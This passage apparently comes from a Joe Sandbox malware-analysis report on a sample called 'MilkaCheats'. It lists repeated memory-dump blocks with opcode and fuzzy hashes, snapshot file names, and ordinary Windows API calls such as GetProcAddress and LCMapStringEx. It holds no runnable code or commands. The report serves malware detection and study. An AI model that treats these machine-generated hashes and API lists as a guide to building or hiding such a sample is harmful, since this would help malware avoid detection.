                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 574aed5e60e380fbd21de6db32e619e3f7ddf846713984bead572ba33e0e4722
                                                                                              • Instruction ID: 10b6260ad87edddf35c85cdd51e4b350060dee8e2065cad0a28d3bae8de97e56
                                                                                              • Opcode Fuzzy Hash: 574aed5e60e380fbd21de6db32e619e3f7ddf846713984bead572ba33e0e4722
                                                                                              • Instruction Fuzzy Hash: CDE02671D0C2016AD310EF50D881B69F3EE9F97354F025E2C8164BB1C2E7B5E0208B59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 991f35f4519ef78fb79e3423609d799c38bee837ecbf504b4e026d537cba0194
                                                                                              • Instruction ID: fe32aa37a38b3d5f98c580eabf6b3370ab99a3b0082d390882df6b55a6586911
                                                                                              • Opcode Fuzzy Hash: 991f35f4519ef78fb79e3423609d799c38bee837ecbf504b4e026d537cba0194
                                                                                              • Instruction Fuzzy Hash: 36F03CB4A013159FCB55CF29C8909AABFF0FB1A314B5888ADE859D7342E235D846CB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c22c6b1cbe60adf494f3244516280e2f7d40bd5b3481dfe2e35f3bd81bb2b4b2
                                                                                              • Instruction ID: f1a84c71dcd9fff5fe4d038d0fd9615d18c6a2f42ac4fa5895e43ac4eec48cea
                                                                                              • Opcode Fuzzy Hash: c22c6b1cbe60adf494f3244516280e2f7d40bd5b3481dfe2e35f3bd81bb2b4b2
                                                                                              • Instruction Fuzzy Hash: 15E012744553098AD710CF04C5616B7B3F0EF8B741F006859E589AFA10F3789C04E72A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cb3d1977ac2b8be9356dfbbbb23a5b31506f4f45a913796d615d6814ceec46ac
                                                                                              • Instruction ID: 36da6d9cd270071304852e4f56acc928b21862ab6f897e72d0d62858a047d616
                                                                                              • Opcode Fuzzy Hash: cb3d1977ac2b8be9356dfbbbb23a5b31506f4f45a913796d615d6814ceec46ac
                                                                                              • Instruction Fuzzy Hash: 32F02E33D015A04FD72ACD2488515B5F7B0FB46204F0B01AD88D1B7704C63A6F07C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2e24c9bfb4cf332899fb73c25273ccf871f83bd892387fafdc8e73d2d010a2d
                                                                                              • Instruction ID: a3b1f488dffc03bceac8c2b3b766cf4414d08fc6de72786e5806120dae95dc99
                                                                                              • Opcode Fuzzy Hash: d2e24c9bfb4cf332899fb73c25273ccf871f83bd892387fafdc8e73d2d010a2d
                                                                                              • Instruction Fuzzy Hash: 0EE08C32911728EBCB55DB8CD944D8AF3ECEB44B10B1144A7B501E3211C670DE40C7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4e92c1024d163d744d058ea5e2e14fb420d2c5fa1e1ee08206d5bd9cab9d29c
                                                                                              • Instruction ID: 53dcaeeac7152c667a699c12e50521daf1e6eae34437cc3099310b9360144825
                                                                                              • Opcode Fuzzy Hash: b4e92c1024d163d744d058ea5e2e14fb420d2c5fa1e1ee08206d5bd9cab9d29c
                                                                                              • Instruction Fuzzy Hash: 27E00A3491560C8BD658EF20E5554BBB3627F45300B51741CA1835BEA3CF68BC01EF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9f72bfb25c67bd251caac9eacff081d618ec1bd9fe83137742db0d83bbc4e76
                                                                                              • Instruction ID: ee8be7abbc7f1ee709470c8a67d01cfa0afc143fc20b2b3645f41e766a6cc85b
                                                                                              • Opcode Fuzzy Hash: f9f72bfb25c67bd251caac9eacff081d618ec1bd9fe83137742db0d83bbc4e76
                                                                                              • Instruction Fuzzy Hash: E2C08C6AF45009C78E009EA8BC814F9F338DB8B121F002036CA09E3602D629E51D87DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9d11b460ef67fe5ea15234daa9cb0a6d92ef8f6c9115c1b04745392a08f2264
                                                                                              • Instruction ID: 14e2ba3fecf5ef123e9866cd5c65c173cbbadffb9738183d701e07690e4349d8
                                                                                              • Opcode Fuzzy Hash: b9d11b460ef67fe5ea15234daa9cb0a6d92ef8f6c9115c1b04745392a08f2264
                                                                                              • Instruction Fuzzy Hash: 83C02B78C440028BC2041F706C0C1BAB1391B0F202F103434D00B53043EA60C000462F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f51e1fe94b134a4920c6068f11825d6fa878326ed500dc8ece34ed95d824f43
                                                                                              • Instruction ID: 871ad96ca26eed3a773456a705cbe863e9cd2826c8a5f6c37760372897d5e113
                                                                                              • Opcode Fuzzy Hash: 8f51e1fe94b134a4920c6068f11825d6fa878326ed500dc8ece34ed95d824f43
                                                                                              • Instruction Fuzzy Hash: BEC08C34680B0096CE3AE91082713E43394A392782F80048ED8028B746CE1F9C82F730
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: de3b5ff09b1d0d1ae63b0a177684ffe8e07211a5b831b2f8fce72c0c22e4e9d6
                                                                                              • Instruction ID: 1b2c052b8400636e4bcb222e68c7052c52bfebdc02ffd80a39b0c24950552690
                                                                                              • Opcode Fuzzy Hash: de3b5ff09b1d0d1ae63b0a177684ffe8e07211a5b831b2f8fce72c0c22e4e9d6
                                                                                              • Instruction Fuzzy Hash: 8DB04834E182008AC3148F14D2519AAB6B6A78F201F11A12DD84C23251C23198008F29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 520558dd20f180bea5b7d0c18e496322c3032679640e7065b26555724ee1b783
                                                                                              • Instruction ID: f8f7dfff36ee334b8041c2b8ff66e2fed51feeb52af1e9a8ebdff7ac0544a751
                                                                                              • Opcode Fuzzy Hash: 520558dd20f180bea5b7d0c18e496322c3032679640e7065b26555724ee1b783
                                                                                              • Instruction Fuzzy Hash: D0900224D581018A81088F01A450870E23B764B101E2434288009334514651D404850C
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000C6ACA
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000C6AD8
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000C6AE9
                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000C6AFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                              • API String ID: 667068680-1247241052
                                                                                              • Opcode ID: 45bd638c45ed047e4ace6d3980636b614aa9f55b5a801a4045f2416c506d87f5
                                                                                              • Instruction ID: c3d236b8fe4deecef682ea353ce49c4b444584ffc3c61b1a5e2b3d31a0ab7d98
                                                                                              • Opcode Fuzzy Hash: 45bd638c45ed047e4ace6d3980636b614aa9f55b5a801a4045f2416c506d87f5
                                                                                              • Instruction Fuzzy Hash: 7BE0E6355527B0AFD3009FB2BD4D8853A94AB46B663410461F702FA9B0D6B405908754
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3907804496
                                                                                              • Opcode ID: c71a0d0f9198d3046371c7cbc1978002d220423bc3bb0fcf391d8938726c400d
                                                                                              • Instruction ID: b0c72adbdf6732cc15128a6ec2f4ba85ee20e1c301898450483d6e85e5d9d5da
                                                                                              • Opcode Fuzzy Hash: c71a0d0f9198d3046371c7cbc1978002d220423bc3bb0fcf391d8938726c400d
                                                                                              • Instruction Fuzzy Hash: 2CB1DF74A04349AFDB61DF98C880BAEBBF5AF45310F14815AE514AB392DB709A46CB70
                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 000CA527
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 000CA635
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 000CA7A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 1206542248-393685449
                                                                                              • Opcode ID: b2b3afcc8f608bc960a4722f4239594aa7adc25e26ec81b7c66d03c66642a2cb
                                                                                              • Instruction ID: e11b1bb08dbec1eafcc01bab958d0ad4fbfc59886c04b54816b3dcdce79180ff
                                                                                              • Opcode Fuzzy Hash: b2b3afcc8f608bc960a4722f4239594aa7adc25e26ec81b7c66d03c66642a2cb
                                                                                              • Instruction Fuzzy Hash: B2B17A71A0020DEFCF29DFA4C881EAEB7B5FF06318B14815EE8016B252D735DA51CB96
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,865EA617,?,000D57D3,?,?,00000000,00000000), ref: 000D5787
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: 77e964aaef9af0ff97f81f721ce077a6cf6605865e1ad86522eb629902f44491
                                                                                              • Instruction ID: ee1578190efeace094ff8ab8dde9f3cefd3aa8113018fefcca413d12ef7ed5e1
                                                                                              • Opcode Fuzzy Hash: 77e964aaef9af0ff97f81f721ce077a6cf6605865e1ad86522eb629902f44491
                                                                                              • Instruction Fuzzy Hash: 8321EB35A04B50EBD7619B61BC84A5A77A8EB41B65F340226EE15BB3D1E634EE00C6F0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 000C6923
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 000C698E
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C69AB
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C69EA
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C6A49
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000C6A6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiStringWide
                                                                                              • String ID:
                                                                                              • API String ID: 2829165498-0
                                                                                              • Opcode ID: be21da490c96100e450798e3450d093e4e1f1068c884163ca6ad31b5191a914e
                                                                                              • Instruction ID: ea4af62d25625fa97b768b5769f9cc8143846111187ce1524bf75fd8fda96c28
                                                                                              • Opcode Fuzzy Hash: be21da490c96100e450798e3450d093e4e1f1068c884163ca6ad31b5191a914e
                                                                                              • Instruction Fuzzy Hash: 66517C72A0020AAFEB309F64CC45FAE7BA9EB44750F158129FA15FA190DB369D148F61
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,000CA091,000C87BA,000C795C), ref: 000CA0A8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000CA0B6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000CA0CF
                                                                                              • SetLastError.KERNEL32(00000000,000CA091,000C87BA,000C795C), ref: 000CA121
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 5a186aaebc9018271281bcc7892eb13cf5f7410edab3bfbb832256d0844acee0
                                                                                              • Instruction ID: a95216822875e45c721f37e0d5f2cf7d9cf7a48099bb6271cd43091713fa21e9
                                                                                              • Opcode Fuzzy Hash: 5a186aaebc9018271281bcc7892eb13cf5f7410edab3bfbb832256d0844acee0
                                                                                              • Instruction Fuzzy Hash: B00188367093296EAB642BB57C87F9E3A94EB037B8F34032DFA10554F1EF558C81A145
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,865EA617,?,?,00000000,000E3DE9,000000FF,?,000D1881,?,?,000D1855,00000000), ref: 000D1926
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D1938
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,000E3DE9,000000FF,?,000D1881,?,?,000D1855,00000000), ref: 000D195A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
